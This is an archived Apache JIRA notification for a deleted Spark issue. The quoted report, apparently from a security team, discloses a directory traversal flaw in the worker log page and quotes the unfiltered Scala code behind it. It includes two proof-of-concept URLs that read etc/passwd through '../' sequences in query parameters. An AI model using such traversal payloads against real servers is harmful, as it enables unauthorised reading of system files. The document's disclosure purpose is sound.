You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@spark.apache.org by "Patrick Wendell (JIRA)" <ji...@apache.org> on 2015/06/03 19:29:38 UTC
[jira] [Deleted] (SPARK-8073) Directory traversal vulnerability
[ https://issues.apache.org/jira/browse/SPARK-8073?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Patrick Wendell deleted SPARK-8073:
-----------------------------------
> Directory traversal vulnerability
> ---------------------------------
>
> Key: SPARK-8073
> URL: https://issues.apache.org/jira/browse/SPARK-8073
> Project: Spark
> Issue Type: Bug
> Environment: Centos6.4
> Reporter: 0keeTeam
> Priority: Critical
>
> We are a information security team from QIHU 360 company, China.
> We found a 0day vulnerability in spark and writing to apply for a CVE ID,Please refer to below report. Thanks!
> [Team info]
> name: 0keeTeam
> company: QIHU 360 company, China
> email: g-sec-web@360.cn
> Details of the vulnerability are as follows:
> {color:red}
> Poc&Exp:
> http://xxx.com/logPage/?appId=../../../../../../../../../../../../../../../&executorId=&logType=etc/passwd
> or:
> http://xxx.com/logPage/?driverId=../../../../../../../../../../../../../../../&logType=etc/passwd
> {color}
> *spark-1.3.1\core\src\main\scala\org\apache\spark\deploy\worker\ui\LogPage.scala : Line36:*
> {quote}{color:red}// parameters get from GET are not filtered{color}
> val appId = Option(request.getParameter("appId"))
> val executorId = Option(request.getParameter("executorId"))
> val driverId = Option(request.getParameter("driverId"))
> val logType = request.getParameter("logType")
> val offset = Option(request.getParameter("offset")).map(_.toLong)
> val byteLength = Option(request.getParameter("byteLength")).map(_.toInt).getOrElse(defaultBytes)
> ........
> val (logText, startByte, endByte, logLength) = getLog(logDir, logType, offset, byteLength)
> {quote}
> *and Line125:*
> {quote}
> private def getLog(
> ........
> val files = RollingFileAppender.getSortedRolledOverFiles(logDirectory, logType)
> ........
> val logText = Utils.offsetBytes(files, startIndex, endIndex)
> {quote}
> *spark-1.3.1\core\src\main\scala\org\apache\spark\util\logging\RollingFileAppender.scala :Line152:*
> {quote}
> def getSortedRolledOverFiles(directory: String, activeFileName: String):
> ........
> val file = new File(directory, activeFileName).getAbsoluteFile
> ........
> {quote}
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscribe@spark.apache.org
For additional commands, e-mail: issues-help@spark.apache.org